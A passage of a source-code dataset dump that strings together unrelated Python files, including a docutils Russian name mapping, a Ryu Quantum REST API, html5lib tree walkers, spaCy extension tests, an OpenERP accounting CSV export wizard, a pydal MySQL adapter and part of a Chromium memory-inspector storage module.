u'рубрика': u'rubric',
u'совет': u'hint',
u'содержание': u'contents',
u'тема': u'topic',
u'эпиграф': u'epigraph',
u'header (translation required)': 'header',
u'footer (translation required)': 'footer',}
"""Russian name to registered (in directives/__init__.py) directive name
mapping."""
roles = {
u'акроним': 'acronym',
u'код': 'code',
u'анонимная-ссылка': 'anonymous-reference',
u'буквально': 'literal',
u'математика': 'math',
u'верхний-индекс': 'superscript',
u'выделение': 'emphasis',
u'именованная-ссылка': 'named-reference',
u'индекс': 'index',
u'нижний-индекс': 'subscript',
u'сильное-выделение': 'strong',
u'сокращение': 'abbreviation',
u'ссылка-замена': 'substitution-reference',
u'ссылка-на-pep': 'pep-reference',
u'ссылка-на-rfc': 'rfc-reference',
u'ссылка-на-uri': 'uri-reference',
u'ссылка-на-заглавие': 'title-reference',
u'ссылка-на-сноску': 'footnote-reference',
u'цитатная-ссылка': 'citation-reference',
u'цель': 'target',
u'сырой': 'raw',}
"""Mapping of Russian role names to canonical role names for interpreted text.
"""
| bsd-3-clause |
netgroup/dreamer-ryu | ryu/app/rest_quantum.py | 22 | 4625 | # Copyright (C) 2012 Nippon Telegraph and Telephone Corporation.
# Copyright (C) 2012 Isaku Yamahata <yamahata at private email ne jp>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This module provides a set of REST APIs dedicated to the OpenStack Ryu plug-in.
- Interface (uuid in ovsdb) registration
- Maintain interface association to a network
Used by OpenStack Ryu plug-in.
"""
import json
from webob import Response
from ryu.base import app_manager
from ryu.app.wsgi import (ControllerBase,
WSGIApplication)
from ryu.lib import quantum_ifaces
# REST API for openstack quantum
# get the list of iface-ids
# GET /v1.0/quantum/ports/
#
# register the iface_id
# POST /v1.0/quantum/ports/{iface_id}
#
# unregister iface_id
# DELETE /v1.0/quantum/ports/{iface_id}
#
# associate network_id with iface_id
# GET /v1.0/quantum/ports/{iface_id}/network_id
#
# associate network_id with iface_id
# POST /v1.0/quantum/ports/{iface_id}/network_id/{network_id}
#
# update network_id with iface_id
# PUT /v1.0/quantum/ports/{iface_id}/network_id/{network_id}
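# Hedged request sketch (host, port and ids are hypothetical):
#   curl -X POST http://127.0.0.1:8080/v1.0/quantum/ports/<iface_id>/network_id/<network_id>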
class QuantumController(ControllerBase):
def __init__(self, req, link, data, **config):
super(QuantumController, self).__init__(req, link, data, **config)
self.ifaces = data
def list_ifaces(self, _req, **_kwargs):
body = json.dumps(self.ifaces.keys())
return Response(content_type='application/json', body=body)
def delete_iface(self, _req, iface_id, **_kwargs):
self.ifaces.unregister(iface_id)
return Response(status=200)
def list_keys(self, _req, iface_id, **_kwargs):
try:
keys = self.ifaces.list_keys(iface_id)
except KeyError:
return Response(status=404)
body = json.dumps(keys)
return Response(content_type='application/json', body=body)
def get_key(self, _req, iface_id, key, **_kwargs):
try:
value = self.ifaces.get_key(iface_id, key)
except KeyError:
return Response(status=404)
body = json.dumps(value)
return Response(content_type='application/json', body=body)
def create_value(self, _req, iface_id, key, value, **_kwargs):
try:
self.ifaces.set_key(iface_id, key, value)
except ValueError:
return Response(status=404)
return Response(status=200)
def update_value(self, _req, iface_id, key, value, **_kwargs):
try:
self.ifaces.update_key(iface_id, key, value)
except ValueError:
return Response(status=404)
return Response(status=200)
class QuantumIfaceAPI(app_manager.RyuApp):
_CONTEXTS = {
'quantum_ifaces': quantum_ifaces.QuantumIfaces,
'wsgi': WSGIApplication,
}
def __init__(self, *args, **kwargs):
super(QuantumIfaceAPI, self).__init__(*args, **kwargs)
self.ifaces = kwargs['quantum_ifaces']
wsgi = kwargs['wsgi']
mapper = wsgi.mapper
controller = QuantumController
wsgi.registory[controller.__name__] = self.ifaces
route_name = 'quantum_ifaces'
uri = '/v1.0/quantum'
ports_uri = uri + '/ports'
s = mapper.submapper(controller=controller)
s.connect(route_name, ports_uri, action='list_ifaces',
conditions=dict(method=['GET', 'HEAD']))
iface_uri = ports_uri + '/{iface_id}'
s.connect(route_name, iface_uri, action='delete_iface',
conditions=dict(method=['DELETE']))
keys_uri = iface_uri + '/keys'
s.connect(route_name, keys_uri, action='list_keys',
conditions=dict(method=['GET', 'HEAD']))
key_uri = keys_uri + '/{key}'
s.connect(route_name, key_uri, action='get_key',
conditions=dict(method=['GET', 'HEAD']))
value_uri = keys_uri + '/{key}/{value}'
s.connect(route_name, value_uri, action='create_value',
conditions=dict(method=['POST']))
s.connect(route_name, value_uri, action='update_value',
conditions=dict(method=['PUT']))
| apache-2.0 |
buskjan/inetradio | lib/python3.5/site-packages/pip/_vendor/html5lib/treewalkers/__init__.py | 354 | 5544 | """A collection of modules for iterating through different kinds of
tree, generating tokens identical to those produced by the tokenizer
module.
To create a tree walker for a new type of tree, you need to
implement a tree walker object (called TreeWalker by convention) that
implements a 'serialize' method taking a tree as sole argument and
returning an iterator generating tokens.
"""
from __future__ import absolute_import, division, unicode_literals
from .. import constants
from .._utils import default_etree
__all__ = ["getTreeWalker", "pprint", "dom", "etree", "genshi", "etree_lxml"]
treeWalkerCache = {}
def getTreeWalker(treeType, implementation=None, **kwargs):
"""Get a TreeWalker class for various types of tree with built-in support
Args:
treeType (str): the name of the tree type required (case-insensitive).
Supported values are:
- "dom": The xml.dom.minidom DOM implementation
- "etree": A generic walker for tree implementations exposing an
elementtree-like interface (known to work with
ElementTree, cElementTree and lxml.etree).
- "lxml": Optimized walker for lxml.etree
- "genshi": a Genshi stream
implementation: A module implementing the tree type, e.g.
xml.etree.ElementTree or cElementTree (currently applies to the
"etree" tree type only).
"""
treeType = treeType.lower()
if treeType not in treeWalkerCache:
if treeType == "dom":
from . import dom
treeWalkerCache[treeType] = dom.TreeWalker
elif treeType == "genshi":
from . import genshi
treeWalkerCache[treeType] = genshi.TreeWalker
elif treeType == "lxml":
from . import etree_lxml
treeWalkerCache[treeType] = etree_lxml.TreeWalker
elif treeType == "etree":
from . import etree
if implementation is None:
implementation = default_etree
# XXX: NEVER cache here, caching is done in the etree submodule
return etree.getETreeModule(implementation, **kwargs).TreeWalker
return treeWalkerCache.get(treeType)
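# Hedged usage sketch (assumes an ElementTree document ``tree``):
#   TreeWalker = getTreeWalker("etree")
#   for token in TreeWalker(tree):
#       print(token["type"])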
def concatenateCharacterTokens(tokens):
pendingCharacters = []
for token in tokens:
type = token["type"]
if type in ("Characters", "SpaceCharacters"):
pendingCharacters.append(token["data"])
else:
if pendingCharacters:
yield {"type": "Characters", "data": "".join(pendingCharacters)}
pendingCharacters = []
yield token
if pendingCharacters:
yield {"type": "Characters", "data": "".join(pendingCharacters)}
def pprint(walker):
"""Pretty printer for tree walkers"""
output = []
indent = 0
for token in concatenateCharacterTokens(walker):
type = token["type"]
if type in ("StartTag", "EmptyTag"):
# tag name
if token["namespace"] and token["namespace"] != constants.namespaces["html"]:
if token["namespace"] in constants.prefixes:
ns = constants.prefixes[token["namespace"]]
else:
ns = token["namespace"]
name = "%s %s" % (ns, token["name"])
else:
name = token["name"]
output.append("%s<%s>" % (" " * indent, name))
indent += 2
# attributes (sorted for consistent ordering)
attrs = token["data"]
for (namespace, localname), value in sorted(attrs.items()):
if namespace:
if namespace in constants.prefixes:
ns = constants.prefixes[namespace]
else:
ns = namespace
name = "%s %s" % (ns, localname)
else:
name = localname
output.append("%s%s=\"%s\"" % (" " * indent, name, value))
# self-closing
if type == "EmptyTag":
indent -= 2
elif type == "EndTag":
indent -= 2
elif type == "Comment":
output.append("%s<!-- %s -->" % (" " * indent, token["data"]))
elif type == "Doctype":
if token["name"]:
if token["publicId"]:
output.append("""%s<!DOCTYPE %s "%s" "%s">""" %
(" " * indent,
token["name"],
token["publicId"],
token["systemId"] if token["systemId"] else ""))
elif token["systemId"]:
output.append("""%s<!DOCTYPE %s "" "%s">""" %
(" " * indent,
token["name"],
token["systemId"]))
else:
output.append("%s<!DOCTYPE %s>" % (" " * indent,
token["name"]))
else:
output.append("%s<!DOCTYPE >" % (" " * indent,))
elif type == "Characters":
output.append("%s\"%s\"" % (" " * indent, token["data"]))
elif type == "SpaceCharacters":
assert False, "concatenateCharacterTokens should have got rid of all Space tokens"
else:
raise ValueError("Unknown token type, %s" % type)
return "\n".join(output)
| gpl-3.0 |
aikramer2/spaCy | spacy/tests/test_underscore.py | 2 | 3265 | # coding: utf-8
from __future__ import unicode_literals
import pytest
from mock import Mock
from ..vocab import Vocab
from ..tokens import Doc, Span, Token
from ..tokens.underscore import Underscore
def test_create_doc_underscore():
doc = Mock()
doc.doc = doc
uscore = Underscore(Underscore.doc_extensions, doc)
assert uscore._doc is doc
assert uscore._start is None
assert uscore._end is None
def test_doc_underscore_getattr_setattr():
doc = Mock()
doc.doc = doc
doc.user_data = {}
Underscore.doc_extensions['hello'] = (False, None, None, None)
doc._ = Underscore(Underscore.doc_extensions, doc)
assert doc._.hello == False
doc._.hello = True
assert doc._.hello == True
def test_create_span_underscore():
span = Mock(doc=Mock(), start=0, end=2)
uscore = Underscore(Underscore.span_extensions, span,
start=span.start, end=span.end)
assert uscore._doc is span.doc
assert uscore._start is span.start
assert uscore._end is span.end
def test_span_underscore_getter_setter():
span = Mock(doc=Mock(), start=0, end=2)
Underscore.span_extensions['hello'] = (None, None,
lambda s: (s.start, 'hi'),
lambda s, value: setattr(s, 'start',
value))
span._ = Underscore(Underscore.span_extensions, span,
start=span.start, end=span.end)
assert span._.hello == (0, 'hi')
span._.hello = 1
assert span._.hello == (1, 'hi')
def test_token_underscore_method():
token = Mock(doc=Mock(), idx=7, say_cheese=lambda token: 'cheese')
Underscore.token_extensions['hello'] = (None, token.say_cheese,
None, None)
token._ = Underscore(Underscore.token_extensions, token, start=token.idx)
assert token._.hello() == 'cheese'
@pytest.mark.parametrize('obj', [Doc, Span, Token])
def test_doc_underscore_remove_extension(obj):
ext_name = 'to_be_removed'
obj.set_extension(ext_name, default=False)
assert obj.has_extension(ext_name)
obj.remove_extension(ext_name)
assert not obj.has_extension(ext_name)
@pytest.mark.parametrize('obj', [Doc, Span, Token])
def test_underscore_raises_for_dup(obj):
obj.set_extension('test', default=None)
with pytest.raises(ValueError):
obj.set_extension('test', default=None)
@pytest.mark.parametrize('invalid_kwargs', [
{'getter': None, 'setter': lambda: None},
{'default': None, 'method': lambda: None, 'getter': lambda: None},
{'setter': lambda: None},
{'default': None, 'method': lambda: None},
{'getter': True}])
def test_underscore_raises_for_invalid(invalid_kwargs):
invalid_kwargs['force'] = True
with pytest.raises(ValueError):
Doc.set_extension('test', **invalid_kwargs)
@pytest.mark.parametrize('valid_kwargs', [
{'getter': lambda: None},
{'getter': lambda: None, 'setter': lambda: None},
{'default': 'hello'},
{'default': None},
{'method': lambda: None}])
def test_underscore_accepts_valid(valid_kwargs):
valid_kwargs['force'] = True
Doc.set_extension('test', **valid_kwargs)
| mit |
BT-csanchez/account-financial-reporting | account_export_csv/wizard/account_export_csv.py | 29 | 16458 | # -*- coding: utf-8 -*-
##############################################################################
#
# Author Joel Grand-Guillaume and Vincent Renaville Copyright 2013
# Camptocamp SA
# CSV data formating inspired from
# http://docs.python.org/2.7/library/csv.html?highlight=csv#examples
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import itertools
import tempfile
from cStringIO import StringIO
import base64
import csv
import codecs
from openerp.osv import orm, fields
from openerp.tools.translate import _
class AccountUnicodeWriter(object):
"""
A CSV writer which will write rows to CSV file "f",
which is encoded in the given encoding.
"""
def __init__(self, f, dialect=csv.excel, encoding="utf-8", **kwds):
# Redirect output to a queue
self.queue = StringIO()
# create a writer with Excel formatting settings
self.writer = csv.writer(self.queue, dialect=dialect, **kwds)
self.stream = f
self.encoder = codecs.getincrementalencoder(encoding)()
def writerow(self, row):
# we ensure that we do not try to encode None or bool
row = (x or u'' for x in row)
encoded_row = [
c.encode("utf-8") if isinstance(c, unicode) else c for c in row]
self.writer.writerow(encoded_row)
# Fetch UTF-8 output from the queue ...
data = self.queue.getvalue()
data = data.decode("utf-8")
# ... and reencode it into the target encoding
data = self.encoder.encode(data)
# write to the target stream
self.stream.write(data)
# empty queue
self.queue.truncate(0)
def writerows(self, rows):
for row in rows:
self.writerow(row)
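# Hedged usage sketch (values hypothetical):
#   buf = StringIO()
#   writer = AccountUnicodeWriter(buf)
#   writer.writerow([u'libellé', 42.0])
#   buf.getvalue()  # UTF-8 encoded CSV data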
class AccountCSVExport(orm.TransientModel):
_name = 'account.csv.export'
_description = 'Export Accounting'
_columns = {
'data': fields.binary('CSV', readonly=True),
'company_id': fields.many2one('res.company', 'Company',
invisible=True),
'fiscalyear_id': fields.many2one('account.fiscalyear', 'Fiscalyear',
required=True),
'periods': fields.many2many(
'account.period', 'rel_wizard_period',
'wizard_id', 'period_id', 'Periods',
help='All periods in the fiscal year if empty'),
'journal_ids': fields.many2many(
'account.journal',
'rel_wizard_journal',
'wizard_id',
'journal_id',
'Journals',
help='If empty, use all journals, only used for journal entries'),
'export_filename': fields.char('Export CSV Filename', size=128),
}
def _get_company_default(self, cr, uid, context=None):
comp_obj = self.pool['res.company']
return comp_obj._company_default_get(cr, uid, 'account.fiscalyear',
context=context)
def _get_fiscalyear_default(self, cr, uid, context=None):
fiscalyear_obj = self.pool['account.fiscalyear']
context = dict(context,
company_id=self._get_company_default(cr, uid, context))
return fiscalyear_obj.find(cr, uid, dt=None, exception=True,
context=context)
_defaults = {'company_id': _get_company_default,
'fiscalyear_id': _get_fiscalyear_default,
'export_filename': 'account_export.csv'}
def action_manual_export_account(self, cr, uid, ids, context=None):
this = self.browse(cr, uid, ids)[0]
rows = self.get_data(cr, uid, ids, "account", context)
file_data = StringIO()
try:
writer = AccountUnicodeWriter(file_data)
writer.writerows(rows)
file_value = file_data.getvalue()
self.write(cr, uid, ids,
{'data': base64.encodestring(file_value)},
context=context)
finally:
file_data.close()
return {
'type': 'ir.actions.act_window',
'res_model': 'account.csv.export',
'view_mode': 'form',
'view_type': 'form',
'res_id': this.id,
'views': [(False, 'form')],
'target': 'new',
}
def _get_header_account(self, cr, uid, ids, context=None):
return [_(u'CODE'),
_(u'NAME'),
_(u'DEBIT'),
_(u'CREDIT'),
_(u'BALANCE'),
]
def _get_rows_account(self, cr, uid, ids,
fiscalyear_id,
period_range_ids,
journal_ids,
context=None):
"""
Return the list of rows for the CSV file
"""
cr.execute("""
select ac.code,ac.name,
sum(debit) as sum_debit,
sum(credit) as sum_credit,
sum(debit) - sum(credit) as balance
from account_move_line as aml,account_account as ac
where aml.account_id = ac.id
and period_id in %(period_ids)s
group by ac.id,ac.code,ac.name
order by ac.code
""",
{'fiscalyear_id': fiscalyear_id,
'period_ids': tuple(period_range_ids)}
)
res = cr.fetchall()
rows = []
for line in res:
rows.append(list(line))
return rows
def action_manual_export_analytic(self, cr, uid, ids, context=None):
this = self.browse(cr, uid, ids)[0]
rows = self.get_data(cr, uid, ids, "analytic", context)
file_data = StringIO()
try:
writer = AccountUnicodeWriter(file_data)
writer.writerows(rows)
file_value = file_data.getvalue()
self.write(cr, uid, ids,
{'data': base64.encodestring(file_value)},
context=context)
finally:
file_data.close()
return {
'type': 'ir.actions.act_window',
'res_model': 'account.csv.export',
'view_mode': 'form',
'view_type': 'form',
'res_id': this.id,
'views': [(False, 'form')],
'target': 'new',
}
def _get_header_analytic(self, cr, uid, ids, context=None):
return [_(u'ANALYTIC CODE'),
_(u'ANALYTIC NAME'),
_(u'CODE'),
_(u'ACCOUNT NAME'),
_(u'DEBIT'),
_(u'CREDIT'),
_(u'BALANCE'),
]
def _get_rows_analytic(self, cr, uid, ids,
fiscalyear_id,
period_range_ids,
journal_ids,
context=None):
"""
Return the list of rows for the CSV file
"""
cr.execute(""" select aac.code as analytic_code,
aac.name as analytic_name,
ac.code,ac.name,
sum(debit) as sum_debit,
sum(credit) as sum_credit,
sum(debit) - sum(credit) as balance
from account_move_line
left outer join account_analytic_account as aac
on (account_move_line.analytic_account_id = aac.id)
inner join account_account as ac
on account_move_line.account_id = ac.id
and account_move_line.period_id in %(period_ids)s
group by aac.id,aac.code,aac.name,ac.id,ac.code,ac.name
order by aac.code
""",
{'fiscalyear_id': fiscalyear_id,
'period_ids': tuple(period_range_ids)}
)
res = cr.fetchall()
rows = []
for line in res:
rows.append(list(line))
return rows
def action_manual_export_journal_entries(self, cr, uid, ids, context=None):
"""
Here we use TemporaryFile to avoid filling up the OpenERP worker's
memory.
We also write the data to the wizard with a raw SQL query, as `write`
seems to use too much memory as well.
These improvements raised the export from 100k lines to 200k lines
with the default `limit_memory_hard = 805306368` (768MB). With more
lines, you might encounter a MemoryError when trying to download the
file even if it has been generated.
To export a bigger volume of data, it is advised to set
limit_memory_hard to 2097152000 (2GB), generate the file, and let
OpenERP load it in the wizard when downloading it.
Tested with up to 700k generated entry lines.
"""
this = self.browse(cr, uid, ids)[0]
rows = self.get_data(cr, uid, ids, "journal_entries", context)
with tempfile.TemporaryFile() as file_data:
writer = AccountUnicodeWriter(file_data)
writer.writerows(rows)
with tempfile.TemporaryFile() as base64_data:
file_data.seek(0)
base64.encode(file_data, base64_data)
base64_data.seek(0)
cr.execute("""
UPDATE account_csv_export
SET data = %s
WHERE id = %s""", (base64_data.read(), ids[0]))
return {
'type': 'ir.actions.act_window',
'res_model': 'account.csv.export',
'view_mode': 'form',
'view_type': 'form',
'res_id': this.id,
'views': [(False, 'form')],
'target': 'new',
}
def _get_header_journal_entries(self, cr, uid, ids, context=None):
return [
# Standard Sage export fields
_(u'DATE'),
_(u'JOURNAL CODE'),
_(u'ACCOUNT CODE'),
_(u'PARTNER NAME'),
_(u'REF'),
_(u'DESCRIPTION'),
_(u'DEBIT'),
_(u'CREDIT'),
_(u'FULL RECONCILE'),
_(u'PARTIAL RECONCILE'),
_(u'ANALYTIC ACCOUNT CODE'),
# Other fields
_(u'ENTRY NUMBER'),
_(u'ACCOUNT NAME'),
_(u'BALANCE'),
_(u'AMOUNT CURRENCY'),
_(u'CURRENCY'),
_(u'ANALYTIC ACCOUNT NAME'),
_(u'JOURNAL'),
_(u'MONTH'),
_(u'FISCAL YEAR'),
_(u'TAX CODE CODE'),
_(u'TAX CODE NAME'),
_(u'TAX AMOUNT'),
_(u'BANK STATEMENT'),
]
def _get_rows_journal_entries(self, cr, uid, ids,
fiscalyear_id,
period_range_ids,
journal_ids,
context=None):
"""
Create a generator of rows of the CSV file
"""
cr.execute("""
SELECT
account_move_line.date AS date,
account_journal.name as journal,
account_account.code AS account_code,
res_partner.name AS partner_name,
account_move_line.ref AS ref,
account_move_line.name AS description,
account_move_line.debit AS debit,
account_move_line.credit AS credit,
account_move_reconcile.name as full_reconcile,
account_move_line.reconcile_partial_id AS partial_reconcile_id,
account_analytic_account.code AS analytic_account_code,
account_move.name AS entry_number,
account_account.name AS account_name,
account_move_line.debit - account_move_line.credit AS balance,
account_move_line.amount_currency AS amount_currency,
res_currency.name AS currency,
account_analytic_account.name AS analytic_account_name,
account_journal.name as journal,
account_period.code AS month,
account_fiscalyear.name as fiscal_year,
account_tax_code.code AS aml_tax_code_code,
account_tax_code.name AS aml_tax_code_name,
account_move_line.tax_amount AS aml_tax_amount,
account_bank_statement.name AS bank_statement
FROM
public.account_move_line
JOIN account_account on
(account_account.id=account_move_line.account_id)
JOIN account_period on
(account_period.id=account_move_line.period_id)
JOIN account_fiscalyear on
(account_fiscalyear.id=account_period.fiscalyear_id)
JOIN account_journal on
(account_journal.id = account_move_line.journal_id)
LEFT JOIN res_currency on
(res_currency.id=account_move_line.currency_id)
LEFT JOIN account_move_reconcile on
(account_move_reconcile.id = account_move_line.reconcile_id)
LEFT JOIN res_partner on
(res_partner.id=account_move_line.partner_id)
LEFT JOIN account_move on
(account_move.id=account_move_line.move_id)
LEFT JOIN account_tax on
(account_tax.id=account_move_line.account_tax_id)
LEFT JOIN account_tax_code on
(account_tax_code.id=account_move_line.tax_code_id)
LEFT JOIN account_analytic_account on
(account_analytic_account.id=account_move_line.analytic_account_id)
LEFT JOIN account_bank_statement on
(account_bank_statement.id=account_move_line.statement_id)
WHERE account_period.id IN %(period_ids)s
AND account_journal.id IN %(journal_ids)s
ORDER BY account_move_line.date
""",
{'period_ids': tuple(
period_range_ids), 'journal_ids': tuple(journal_ids)}
)
while 1:
# http://initd.org/psycopg/docs/cursor.html#cursor.fetchmany
# Set cursor.arraysize to minimize network round trips
cr.arraysize = 100
rows = cr.fetchmany()
if not rows:
break
for row in rows:
yield row
def get_data(self, cr, uid, ids, result_type, context=None):
get_header_func = getattr(
self, ("_get_header_%s" % (result_type)), None)
get_rows_func = getattr(self, ("_get_rows_%s" % (result_type)), None)
form = self.browse(cr, uid, ids[0], context=context)
fiscalyear_id = form.fiscalyear_id.id
if form.periods:
period_range_ids = [x.id for x in form.periods]
else:
# If not period selected , we take all periods
p_obj = self.pool.get("account.period")
period_range_ids = p_obj.search(
cr, uid, [('fiscalyear_id', '=', fiscalyear_id)],
context=context)
journal_ids = None
if form.journal_ids:
journal_ids = [x.id for x in form.journal_ids]
else:
j_obj = self.pool.get("account.journal")
journal_ids = j_obj.search(cr, uid, [], context=context)
rows = itertools.chain((get_header_func(cr, uid, ids,
context=context),),
get_rows_func(cr, uid, ids,
fiscalyear_id,
period_range_ids,
journal_ids,
context=context)
)
return rows
| agpl-3.0 |
ybenitezf/miner | core/pydal/adapters/mysql.py | 11 | 5041 | # -*- coding: utf-8 -*-
import re
from .._globals import IDENTITY
from ..helpers.methods import varquote_aux
from .base import BaseAdapter
class MySQLAdapter(BaseAdapter):
drivers = ('MySQLdb','pymysql', 'mysqlconnector')
commit_on_alter_table = True
support_distributed_transaction = True
types = {
'boolean': 'CHAR(1)',
'string': 'VARCHAR(%(length)s)',
'text': 'LONGTEXT',
'json': 'LONGTEXT',
'password': 'VARCHAR(%(length)s)',
'blob': 'LONGBLOB',
'upload': 'VARCHAR(%(length)s)',
'integer': 'INT',
'bigint': 'BIGINT',
'float': 'FLOAT',
'double': 'DOUBLE',
'decimal': 'NUMERIC(%(precision)s,%(scale)s)',
'date': 'DATE',
'time': 'TIME',
'datetime': 'DATETIME',
'id': 'INT AUTO_INCREMENT NOT NULL',
'reference': 'INT %(null)s %(unique)s, INDEX %(index_name)s (%(field_name)s), FOREIGN KEY (%(field_name)s) REFERENCES %(foreign_key)s ON DELETE %(on_delete_action)s',
'list:integer': 'LONGTEXT',
'list:string': 'LONGTEXT',
'list:reference': 'LONGTEXT',
'big-id': 'BIGINT AUTO_INCREMENT NOT NULL',
'big-reference': 'BIGINT %(null)s %(unique)s, INDEX %(index_name)s (%(field_name)s), FOREIGN KEY (%(field_name)s) REFERENCES %(foreign_key)s ON DELETE %(on_delete_action)s',
'reference FK': ', CONSTRAINT `FK_%(constraint_name)s` FOREIGN KEY (%(field_name)s) REFERENCES %(foreign_key)s ON DELETE %(on_delete_action)s',
}
QUOTE_TEMPLATE = "`%s`"
def varquote(self,name):
return varquote_aux(name,'`%s`')
def RANDOM(self):
return 'RAND()'
def SUBSTRING(self,field,parameters):
return 'SUBSTRING(%s,%s,%s)' % (self.expand(field),
parameters[0], parameters[1])
def EPOCH(self, first):
return "UNIX_TIMESTAMP(%s)" % self.expand(first)
def CONCAT(self, *items):
return 'CONCAT(%s)' % ','.join(self.expand(x,'string') for x in items)
def REGEXP(self,first,second):
return '(%s REGEXP %s)' % (self.expand(first),
self.expand(second,'string'))
def CAST(self, first, second):
if second=='LONGTEXT': second = 'CHAR'
return 'CAST(%s AS %s)' % (first, second)
def _drop(self,table,mode):
        # Temporarily disabling FOREIGN_KEY_CHECKS breaks referential
        # integrity, but without it MySQL refuses to drop tables that are
        # referenced by foreign keys.
table_rname = table.sqlsafe
return ['SET FOREIGN_KEY_CHECKS=0;','DROP TABLE %s;' % table_rname,
'SET FOREIGN_KEY_CHECKS=1;']
def _insert_empty(self, table):
return 'INSERT INTO %s VALUES (DEFAULT);' % (table.sqlsafe)
def distributed_transaction_begin(self,key):
self.execute('XA START;')
def prepare(self,key):
self.execute("XA END;")
self.execute("XA PREPARE;")
def commit_prepared(self,key):
self.execute("XA COMMIT;")
def rollback_prepared(self,key):
self.execute("XA ROLLBACK;")
    REGEX_URI = re.compile(r'^(?P<user>[^:@]+)(\:(?P<password>[^@]*))?@(?P<host>\[[^/]+\]|[^\:/]+)(\:(?P<port>[0-9]+))?/(?P<db>[^?]+)(\?set_encoding=(?P<charset>\w+))?$')
def __init__(self,db,uri,pool_size=0,folder=None,db_codec ='UTF-8',
credential_decoder=IDENTITY, driver_args={},
adapter_args={}, do_connect=True, after_connection=None):
self.db = db
self.dbengine = "mysql"
self.uri = uri
if do_connect: self.find_driver(adapter_args,uri)
self.pool_size = pool_size
self.folder = folder
self.db_codec = db_codec
self._after_connection = after_connection
self.find_or_make_work_folder()
ruri = uri.split('://',1)[1]
m = self.REGEX_URI.match(ruri)
if not m:
raise SyntaxError(
"Invalid URI string in DAL: %s" % self.uri)
user = credential_decoder(m.group('user'))
if not user:
raise SyntaxError('User required')
password = credential_decoder(m.group('password'))
if not password:
password = ''
host = m.group('host')
if not host:
raise SyntaxError('Host name required')
db = m.group('db')
if not db:
raise SyntaxError('Database name required')
port = int(m.group('port') or '3306')
charset = m.group('charset') or 'utf8'
        driver_args.update(db=db,
                           user=user,  # already passed through credential_decoder above
                           passwd=password,
                           host=host,
                           port=port,
                           charset=charset)
def connector(driver_args=driver_args):
return self.driver.connect(**driver_args)
self.connector = connector
if do_connect: self.reconnect()
def after_connection(self):
self.execute('SET FOREIGN_KEY_CHECKS=1;')
self.execute("SET sql_mode='NO_BACKSLASH_ESCAPES';")
| gpl-2.0 |
ondra-novak/chromium.src | tools/memory_inspector/memory_inspector/data/file_storage.py | 54 | 6131 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""This module handles file-backed storage of the core classes.
The storage is logically organized as follows:
Storage -> N Archives -> 1 Symbol index
                      -> N Snapshots -> 1 Mmaps dump.
                                     -> 0/1 Native heap dump.
Where an "archive" is essentially a collection of snapshots taken for a given
app at a given point in time.
"""
import datetime
import json
import os
from memory_inspector.core import memory_map
from memory_inspector.core import native_heap
from memory_inspector.core import symbol
from memory_inspector.data import serialization
class Storage(object):
_SETTINGS_FILE = 'settings-%s.json'
def __init__(self, root_path):
"""Creates a file-backed storage. Files will be placed in |root_path|."""
self._root = root_path
if not os.path.exists(self._root):
os.makedirs(self._root)
def LoadSettings(self, name):
"""Loads a key-value dict from the /settings-name.json file.
This is for backend and device settings (e.g., symbols path, adb path)."""
file_path = os.path.join(self._root, Storage._SETTINGS_FILE % name)
if not os.path.exists(file_path):
return {}
with open(file_path) as f:
return json.load(f)
def StoreSettings(self, name, settings):
"""Stores a key-value dict into /settings-name.json file."""
assert(isinstance(settings, dict))
file_path = os.path.join(self._root, Storage._SETTINGS_FILE % name)
if not settings:
if os.path.exists(file_path):
os.unlink(file_path)
return
with open(file_path, 'w') as f:
return json.dump(settings, f)
def ListArchives(self):
"""Lists archives. Each of them is a sub-folder inside the |root_path|."""
return sorted(
[name for name in os.listdir(self._root)
if os.path.isdir(os.path.join(self._root, name))])
def OpenArchive(self, archive_name, create=False):
"""Returns an instance of |Archive|."""
archive_path = os.path.join(self._root, archive_name)
if not os.path.exists(archive_path) and create:
os.makedirs(archive_path)
return Archive(archive_name, archive_path)
def DeleteArchive(self, archive_name):
"""Deletes the archive (removing its folder)."""
archive_path = os.path.join(self._root, archive_name)
for f in os.listdir(archive_path):
os.unlink(os.path.join(archive_path, f))
os.rmdir(archive_path)
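# Illustrative usage sketch (hypothetical paths and objects, not part of
# this module):
#
#   storage = Storage('/tmp/memory_inspector_data')
#   archive = storage.OpenArchive('com.example.app', create=True)
#   timestamp = archive.StartNewSnapshot()
#   archive.StoreMemMaps(mmaps)  # a memory_map.Map instance
#   assert archive.HasMemMaps(timestamp)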
class Archive(object):
"""A collection of snapshots, each one holding one memory dump (per kind)."""
_MMAP_EXT = '-mmap.json'
_NHEAP_EXT = '-nheap.json'
_SNAP_EXT = '.snapshot'
_SYM_FILE = 'syms.json'
_TIME_FMT = '%Y-%m-%d_%H-%M-%S-%f'
def __init__(self, name, path):
assert(os.path.isdir(path))
self._name = name
self._path = path
self._cur_snapshot = None
def StoreSymbols(self, symbols):
"""Stores the symbol db (one per the overall archive)."""
assert(isinstance(symbols, symbol.Symbols))
file_path = os.path.join(self._path, Archive._SYM_FILE)
with open(file_path, 'w') as f:
json.dump(symbols, f, cls=serialization.Encoder)
def HasSymbols(self):
return os.path.exists(os.path.join(self._path, Archive._SYM_FILE))
def LoadSymbols(self):
assert(self.HasSymbols())
file_path = os.path.join(self._path, Archive._SYM_FILE)
with open(file_path) as f:
return json.load(f, cls=serialization.SymbolsDecoder)
def StartNewSnapshot(self):
"""Creates a 2014-01-01_02:03:04.snapshot marker (an empty file)."""
self._cur_snapshot = Archive._TimestampToStr(datetime.datetime.now())
file_path = os.path.join(self._path,
self._cur_snapshot + Archive._SNAP_EXT)
assert(not os.path.exists(file_path))
open(file_path, 'w').close()
